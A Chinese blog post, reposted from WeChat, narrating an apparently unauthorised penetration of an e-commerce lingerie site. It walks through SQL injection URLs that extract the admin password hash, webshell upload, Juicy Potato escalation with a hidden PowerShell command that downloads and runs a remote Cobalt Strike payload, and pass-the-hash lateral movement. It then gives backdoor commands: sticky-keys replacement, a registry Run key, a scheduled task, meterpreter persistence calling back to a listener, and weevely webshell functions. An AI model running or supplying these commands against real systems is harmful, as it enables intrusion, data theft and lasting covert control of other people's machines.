首页 > 其他分享 >记一次内衣网站渗透测试

记一次内衣网站渗透测试

时间:2024-01-17 20:12:41浏览次数:46  
标签:文件 shell file 渗透 内衣 exe 测试 权限 php

这站真大,不对,这站真圆.php的站随便随便一测

图片

一枚注入

图片
图片

因为只能读取32位所以使用substring分开读取 https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,(select password from admin limit 1,1),0x7e))%20# https://aaaa.com/1.php?id=210%20and%20extractvalue(1,concat(0x7e,substring((select password from admin limit 1,1),30,35),0x7e))%20#

图片

舒服了,这下可以给光明正大的进去选内衣了

0x02 拿shell

看看robots.txt

图片

inurl:a.com admin

进入后台发现是ECSHOP 这里原本是file改为image绕过

图片

似乎不行被重置了

这里发现可以执行sql语句而且存在绝对路径泄露

图片
图片

ok下面就好说了,写入一句话

图片

0x03 提权

图片

权限有点小低

图片

存在mysql也没其他可以利用的

图片

尝试mysql提权

图片
图片

除了目录不能上传其他条件都满足所以当我没说,上cs,powershell上线

图片

提权这里使用Juicy Potato 具体可以参考三好学生文章 选择想要的任何CLSID,链接

图片

然后我们在以system权限执行powershell

shell style.exe -p "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('powershell地址'))\"" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

这里面的双引号记得转义

图片

0x04 横向渗透

图片

为工作组环境,扫出来0.9也是一台web这里hash传递直接拿下,继续抓hash,目前以有如下账户 wiseadmin shopaccount mysql wiseadmin filetransfer demoadmin WDAGUtilityAccount

平平无奇hash传递--

图片

一个应该是web的的一个demo,然后0.7可能是数据库服务器

都是admin权限了如果想要获取system的话可以使用SelectMyParent,其实也就是j把新进程当中system进程的子进程,这里就用cs的马,先查看winlogon.exe的pid

可以看到这里为500

图片

然后把我们的systen.exe上传,执行shell SelectMyParent.exe systen.exe 500

图片

这步操作其实就是凑点字数 ,哈哈哈哈

0x05 权限维持 

这里就拿本机测试了

粘滞键后门 在windows上连续按5次“Shift”,就可以调出粘滞键

图片

粘滞键指的是电脑使用中的一种快捷键,专为同时按下两个或多个键有困难的人而设计的。粘滞键的主要功能是方便Shift等键的组合使用。粘滞键可以先按一个键位(如shift),再按另一键位,而不是同时按下两个键位,方便某些因身体原因而无法同时按下多键的人。一般的电脑连按五次shift会出现粘滞键提示

使用如下命令

cd windows\system32move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe
图片

如果目标机是 winvista 以上的,即 winvista 以后出的系统,修改 sethc 会提示需要 trustedinstaller 权限,所以想要继续,那就需要修改所有者为Administrator,并修改其权限:

图片
图片
图片
图片

然后修改为完全控制

图片
图片

现在我们连续按下5次shift就弹出一个system权限的cmd

图片

注册表注入后门 在普通用户权限下,攻击者将会需要执行的后门程序或者脚本路径写到注册表 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 键值可以任意设置,或者直接执行如下命令添加启动项 REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v test /t REG_SZ /d "C:\shell.exe" 当管理员重新登录系统时,就会执行后门程序

图片

计划任务后门 

命令:schtasks /Create /tn Updater /tr c:\shell.exe /sc hourly /mo 1

以上的命令会在每小时执行一次shell.exe,在win7及以下的系统使用at命令代替schtasks

meterpreter后门 

meterpreter > run persistence -U -i 5 -p 1234 -r 192.168.220.128 -A 

自动启动一个匹配的

exploit / multi / handler来连接到代理 -L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。

-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。

-S 作为服务自动启动该木马(具有SYSTEM权限) 

-T 要使用的备用可执行模板 

-U 用户登录时自动启动该木马 

-X 系统引导时自动启动该木马 

-h 这个帮助菜单 

-i 每次连接尝试之间的时间间隔(秒) 

-p 运行Metasploit的系统正在侦听的端口 

-r 运行Metasploit监听连接的系统的IP


缺点是容易被杀毒软件查杀,然后它就在目标机新建一个vbs文件,然后每次自动启动他
图片

web后门的话可以使用weevely 这里生成一个shell.php来测试

图片
图片

将文件放入服务器目录下,然后执行 

weevely http://192.168.220.1/shell.php

shell 可以help查看帮助 


audit.etcpasswd | 枚举/etc/passwd 
audit.userfiles | 列举用户/home下具有权限的文件 
audit.mapwebfiles | 枚举任意Web站点的URL链接 
shell.php | 编写php文件 
shell.sh | 编写系统脚本 
system.info | 收集系统信息 
find.suidsgid | 查找SUID / SGID文件和目录 
find.perms | 查找权限可读/写/可执行文件和目录 
backdoor.tcp | TCP端口后门 
backdoor.reversetcp | 反弹TCP连接 
bruteforce.sql | 爆破指定数据库用户名密码 
bruteforce.sqlusers | 爆破所有数据库用户密码 
file.upload | 上传本地文件 
file.upload2web | 上传二进制/ ASCII文件至目标站点文件夹并枚举URL file.enum | 在本地词表的书面枚举远程文件 
file.read | 读文件 
file.rm | 删除文件 
file.check | 检查远程文件的状态(md5值,大小,权限等) 
file.download | 下载远程二进制/ ASCII文件到本地 
sql.console | 启动SQL控制台 
sql.dump | 备份数据库,即脱库
net.scan | 端口扫描
net.phpproxy | 安装远程php代理 
net.ifaces | 显示远程主机网络接口信息 
net.proxy | 安装隧道通信代理

执行一些windows命令

图片

执行自带命令

图片
图片


转载于原文链接: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247485826&idx=2&sn=8f11b7cc12f6c5dfb5eeeb316f14f460&chksm=ce67a31bf9102a0d704877584dc3c49141a376cc1b35c0659f3ae72baa7e77e6de7e0f916db5&scene=21#wechat_redirect

标签:文件,shell,file,渗透,内衣,exe,测试,权限,php
From: https://www.cnblogs.com/backlion/p/17971065

相关文章

  • BC实战后渗透之Bypass Applocker到提权
    0x01前言 提示:当个反面案例看就好,实际上拿下的方式远没有下文说的那么麻烦,只怪自己太心急… 本来是之前BC项目搞下来的一个推广站,当时只拿到了Shell权限是一个普通用户,想提权进一步收集服务器上的信息时,发现运行各种东西都是权限拒绝,提示组策略阻止了这个程序,当时因为还有的别......
  • 对诈骗(杀猪盘)网站的渗透测试
    今天朋友突然告诉我,某转买手机被骗了1200块钱,心理一惊,果然不出所料,那我来试试吧。要来了诈骗网站地址,打开是这种:果断收集一下信息:(由于留言骗子返还朋友钱款,暂时给他留点面子,打点马赛克)查看端口,一猜就是宝塔面板搭建开着80,那就访问一下:从官网查找客服软件的教程。发现后台路径为:/ad......
  • 一次菠菜网站的渗透测试
    从某个大哥手里拿到一个菠菜得day,是一个任意文件上传得0day,通过任意文件上传获取到webshell,但是扫描端口能看到开启了宝塔。然后就出现了下面的问题。使用哥斯拉的bypass插件可以执行命令。用户为WWW,宝塔的默认用户,接下来就是常规操作,提权、SSH登陆拿宝塔。先进行提权,上传脏牛然后......
  • 记一次菠菜网站渗透半成品
    前言在一个风和日丽的下午,我们正在Blank的带领下,兴致勃勃地讨论着,女人。而float先生发现了一个访问了他博客的奇怪IP。哎,根本不把什么网络安全法放在眼里,直接就开打。GameStart浏览器访问会直接跳登陆界面。信息收集路径上敲个X。拿到ThinkPHP和版本号。同时,float先生nmap扫到801......
  • 23.电子商城接口自动化测试 框架进阶实战
    现有问题 可维护性差:一个api发生变化,需要修改用例文件可读性差:无法从代码中看出来明确的业务逻辑断言能力差:响应内容只能一层一层提取架构优化设计 @startumlscale700*500packageconfig<<Folder>>{}packageutils<<Folder>>{}packageapis<......
  • 19.电子商城接口自动化测试 实战
    目录 接口测试流程产品需求分析测试用例设计思路接口自动化脚本编写接口测试流程 @startuml:需求分析;:测试设计;:测试用例评审;:测试执行;:验收;:预发布;:上线;@enduml电子商城需求分析 商城管理后台商城客户端商城业务场景 ......
  • 软件测试/测试开发|Pytest如何使用autouse实现自动传参
    Pytestfixture之autouse使用写自动化用例会写一些前置的fixture操作,用例需要用到就直接传该函数的参数名称就行了。当用例很多的时候,每次都传这个参数,会比较麻烦。fixture里面有个参数autouse,默认是Fasle没开启的,可以设置为True开启自动使用fixture功能,这样用例就不用每次都去传参......
  • 15.宠物商店 接口自动化测试实战
    目录 被测产品需求说明相关知识点接口自动化测试实战被测产品 PetStore宠物商城:一个在线的小型的商城。主要提供了增删查改等操作接口。结合Swagger实现了接口的管理。需求说明 完成宠物商城宠物管理功能接口自动化测试。编写自动化测......
  • fiddler进行弱网2G/3G测试
    1.fiddler抓包配置参考2.工具栏Rules>Performance>SimulateModemSpeeds勾选表示开启弱网3.打开Fiddler,点击菜单栏中的【Rules】-【CustomizeRules】,自定义调节代理服务器的网速if(m_SimulateModem){//每上传1KB数据,延时300msoSession["request-trickle-delay"......
  • Postman接口测试的工具使用
    postman下载:https://www.postman.com/downloads/下载后双击即可安装,安装后需要创建账号,登录后可以在不同平台同步数据。postman主要功能说明postman主要模块功能介绍点击最上面的测试集的添加目录图标,来新增一个根目录,这样等于新建了一个项目.可以将一个项目或一个模块的用......